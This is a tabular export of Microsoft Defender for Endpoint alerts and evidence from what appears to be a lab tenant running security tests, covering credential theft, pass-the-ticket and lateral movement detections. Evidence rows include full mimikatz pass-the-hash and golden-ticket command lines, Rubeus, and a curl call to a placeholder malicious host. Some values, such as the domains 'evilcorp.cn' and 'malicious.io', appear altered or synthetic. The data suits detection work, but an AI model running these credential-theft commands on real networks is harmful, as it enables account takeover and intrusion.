alertId stringclasses 278 values | providerAlertId stringclasses 278 values | incidentId int64 486 989 ⌀ | serviceSource stringclasses 2 values | creationTime stringdate 2022-09-30 05:04:51 2023-01-24 06:03:50 ⌀ | lastUpdatedTime stringdate 2022-11-12 01:35:42 2023-01-24 06:05:47 ⌀ | resolvedTime stringclasses 23 values | firstActivity stringdate 2022-09-07 09:25:00 2023-01-24 05:31:07 ⌀ | lastActivity stringdate 2022-09-30 05:00:00 2023-01-24 05:43:53 ⌀ | title stringclasses 62 values | description stringclasses 51 values | category stringclasses 12 values | status stringclasses 2 values | severity stringclasses 4 values | investigationId int64 20 64 ⌀ | investigationState stringclasses 9 values | classification stringclasses 1 value | determination stringclasses 1 value | detectionSource stringclasses 7 values | detectorId stringclasses 48 values | assignedTo stringclasses 3 values | actorName stringclasses 1 value | threatFamilyName stringclasses 6 values | mitreTechniques listlengths 0 8 ⌀ | devices listlengths 1 6 ⌀ | entities listlengths 0 49 ⌀ | entityType stringclasses 2 values | evidenceCreationTime stringclasses 469 values | verdict stringclasses 5 values | remediationStatus stringclasses 2 values | accountName stringclasses 30 values | domainName stringclasses 17 values | userSid stringclasses 22 values | aadUserId stringclasses 8 values | userPrincipalName stringclasses 14 values | sha1 stringclasses 28 values | sha256 stringclasses 27 values | fileName stringclasses 21 values | filePath stringclasses 13 values | processId int64 0 20.7k ⌀ | processCommandLine stringclasses 67 values | processCreationTime stringclasses 133 values | parentProcessId int64 0 14.6k ⌀ | parentProcessCreationTime stringclasses 63 values | parentProcessFileName stringclasses 14 values | parentProcessFilePath stringclasses 11 values | detectionStatus stringclasses 1 value | deviceId stringclasses 9 values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T15:03:42.41Z | Suspicious | None | root | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043457018415165_838353256 | fe770d07-91ef-4e10-b08a-10d4205d2c4d | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:21:41.8415367Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:10:33.6065838Z | 2022-11-18T05:17:42.023405Z | 'Kekeo' malware was detected | Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Malware | Resolved | Informational | 49 | PendingApproval | TruePositive | SecurityTesting | WindowsDefenderAv | d60f5b90-ecd8-4d77-8186-a801597ec762 | takeshi@msdxv2.m365dpoc.com | null | Kekeo | [] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "M... | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:21:41.8866667Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\Temp",
... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930249254436_-241984083 | 6178cdf4-3eee-4a5d-bb91-6984adeefb2d | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:03:44.9254621Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:01:36.9984727Z | 2022-11-21T02:33:54.0400057Z | Suspicious User Account Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | Resolved | Low | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1033",
"T1087",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDev... | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:45.04Z",
"fileName": null,
"filePath": null,
"ipAddress": ... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963602752501_-1659845888 | c3dcc8f4-55a0-4639-a47d-54119027dd1f | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:59:20.2752831Z | 2022-12-22T08:59:20.6866667Z | null | 2022-12-22T08:47:53.119148Z | 2022-12-22T08:47:53.119148Z | Pass-the-ticket attack | A .kirbi file, a known file extension for Kerberos tickets containing local authenticated users credentials, was observed being created on the machine. This behavior might be associated with an attacker trying to move laterally in the network using stolen user credentials as part of Pass-The-Tickets” attack | CredentialAccess | New | High | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | dc47cd98-e905-40ed-ac04-59c4ff6b97ee | null | null | null | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboar... | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:59:20.2933333Z",
"fileName": "ticket.kirbi",
"filePath": "C:\\M365DAtt... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T08:32:00.2766667Z | Unknown | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:20:15.79Z | Suspicious | None | analyst | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 6,556 | "mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait | 2022-11-11T08:17:12.3967497Z | 4,704 | 2022-11-11T08:16:44.2952776Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:04:36.8866667Z | Suspicious | Active | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 5,760 | ping 127.0.0.1 | 2022-11-21T02:02:27.7361869Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:12:05.72Z | Suspicious | Active | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 8,284 | cmd.exe /c whoami | 2022-11-18T05:10:14.6889142Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
da638043433750693719_-542192991 | 123e9bd8-7024-4dec-a40c-849c669fccb9 | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T04:42:55.0693983Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T04:38:48.0899567Z | 2022-11-18T04:48:32.8733596Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "tmtower-book",
"firstSeen": "2022-10-10T06:18:04.255Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Takeshi",
"domainName": "TMTOWER-BOOK"
}
],
"mdatpDeviceId":... | [
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": null,
"deviceId": null,
"domainName": "TMTOWER-BOOK",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T04:42:55.3033333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreat... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072957493221662_648641683 | a575be64-afce-415c-bfc3-dfbb3d043215 | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:49:09.3221869Z | 2022-12-22T08:49:09.84Z | null | 2022-12-22T08:47:53.413688Z | 2022-12-22T08:47:53.413688Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | New | High | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | null | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687d... | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:49:09.35Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:12:05.38Z | Suspicious | None | alice | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 8,284 | PSEXESVC.exe | 2022-11-18T05:10:14.6889142Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
da638043450382289041_499189581 | 7fe2225b-b6ae-4a93-a261-13e9dd6d5861 | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:10:38.2289225Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:04:12.7195838Z | 2022-11-18T05:13:20.5030117Z | Suspicious Permission Groups Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | Resolved | Low | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1069.001",
"T1069.002",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534... | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:10:38.28Z",
"fileName": null,
"filePath": null,
"ipAddress": ... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:04:55.1233333Z | Suspicious | None | root | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 8,332 | "mimikatz.exe" privilege::debug "kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt: /user:Steve /ticket:C:\M365DAttack\Admin-Tickets\ticket.kirbi /ptt" exit | 2022-11-21T02:02:27.4595079Z | 11,068 | 2022-11-21T02:01:28.4753286Z | powershell.exe | \Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638043450382289041_499189581 | 7fe2225b-b6ae-4a93-a261-13e9dd6d5861 | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:10:38.2289225Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:04:12.7195838Z | 2022-11-18T05:13:20.5030117Z | Suspicious Permission Groups Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | Resolved | Low | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1069.001",
"T1069.002",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDev... | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:10:38.28Z",
"fileName": null,
"filePath": null,
"ipAddress": ... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:27:53.5866667Z | Suspicious | None | operator | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:05:47.3Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037515790724501_-1725971460 | d0a610e4-d7f7-44c6-9501-f20a7fda7b1d | 686 | MicrosoftDefenderForEndpoint | 2022-11-11T08:19:39.0724743Z | 2022-11-18T00:39:00.6933333Z | 2022-11-12T01:35:42.84Z | 2022-11-11T08:17:13.1854178Z | 2022-11-11T08:17:35.2838941Z | File dropped and launched from remote location | A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate. | LateralMovement | Resolved | Medium | 36 | TerminatedBySystem | TruePositive | SecurityTesting | WindowsDefenderAtp | 17d50613-c135-4981-858e-86cdecb4e46e | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1021.002",
"T1105",
"T1570"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48... | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:19:39.1366667Z",
"fileName": null,
"filePath": null,
"ipAddress": nul... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-16T08:31:10.4566667Z | Suspicious | None | jesse | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1109 | 34a6a005-fc93-42dc-ae87-352d3e9921c4 | jesse@msdxv2.m365dpoc.com | 34f6168251ce3ed625e9b8d26b0ce5dad7421dbe | 20a100ad633bd79474edcc3736eefc395d39f7d5904c46ddb96593316ce6b262 | SystemSettingsAdminFlows.exe | C:\Windows\System32 | 2,640 | copy con test.txt | 2022-11-16T08:30:16.5964416Z | 4,704 | 2022-11-16T07:26:02.7983467Z | SystemSettings.exe | C:\Windows\ImmersiveControlPanel | Detected | 7114973b832b32d349815a5d2811738cc10fa650 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T08:47:13.9066667Z | Suspicious | None | hacker | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:12:02.97Z | Suspicious | None | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 8,284 | curl http://malicious | 2022-11-18T05:10:14.6889142Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
da638045930214658044_-423075346 | 731f8403-267f-49a4-b9f2-bfbb454256ea | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:03:41.4658386Z | 2022-11-21T03:45:17.6166667Z | 2022-11-21T03:45:17.4759763Z | 2022-11-21T02:01:28.8879277Z | 2022-11-21T02:30:59.1966323Z | Suspicious RDP session | A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives. | SuspiciousActivity | Resolved | High | 50 | SuccessfullyRemediated | null | null | WindowsDefenderAtp | e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8 | null | null | null | [
"T1003",
"T1021.001",
"T1555",
"T1558.003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDev... | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:41.86Z",
"fileName": null,
"filePath": null,
"ipAddress": ... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:04:26.1266667Z | Suspicious | None | svc_acct | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:17:48.44Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T09:02:48.4133333Z | Suspicious | None | jeff | evilcorp.cn | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:50:49.9533333Z | Suspicious | None | MSDXV8-Win10V$ | malicious.io | S-1-5-18 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001153615003333_1678515249 | 76ffd1e5-45b0-458e-9255-d679c5aa1ddf | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:16:01.5003536Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:12:00.8318757Z | 2022-09-30T06:13:04.3376842Z | File dropped and launched from remote location | A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate. | LateralMovement | Resolved | Medium | 22 | TerminatedBySystem | TruePositive | SecurityTesting | WindowsDefenderAtp | 17d50613-c135-4981-858e-86cdecb4e46e | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1021.002",
"T1105",
"T1570"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "M... | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:16:01.5966667Z",
"fileName": null,
"filePath": null,
"ipAddr... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T16:08:25.23Z | Unknown | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:20:34.2166667Z | Suspicious | None | jeff | evilcorp.cn | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:22:11.6666667Z | Suspicious | None | ronhd | corp.local | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:48:24.7866667Z | Suspicious | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 9,372 | copy con test.txt | 2022-12-22T08:47:23.6053625Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:19:39.2166667Z | Unknown | None | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | ed5324a2b10ad1342da6332982e4c8ec4c3cd096 | fc4864065d84ccb4c855f4c47afa318113c1ba81e105c2ca0a8a33b51fe72299 | ntoskrnl.exe | C:\Windows\System32 | 4 | null | 2022-11-11T08:13:24.9197363Z | null | null | null | null | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
da638043457307128418_307047299 | da638043457307128418_307047299 | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:22:10.7130977Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:09:26.8699077Z | 2022-11-18T05:09:26.8699077Z | Possible lateral movement involving a suspicious file transfer over SMB | A device was detected transfering a suspicious file over SMB to another endpoint. An ongoing attack might be attempting to move laterally by copying implants or other payloads to other endpoints. | LateralMovement | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | MTP | 433625e1-8397-4a2e-a97d-edd4698267b2 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1570",
"T1021.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDev... | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-18T05:22:10.75Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.5",
"parentProcessCreationTime": null,
... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T18:02:35.8466667Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:11:45.81Z | Suspicious | Active | steve | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | 6cbce4a295c163791b60fc23d285e6d84f28ee4c | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 2,504 | type secret.txt | 2022-11-21T02:07:28.5026314Z | 3,020 | 2022-11-21T02:07:15.6313121Z | cmd.exe | C:\Windows\System32 | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
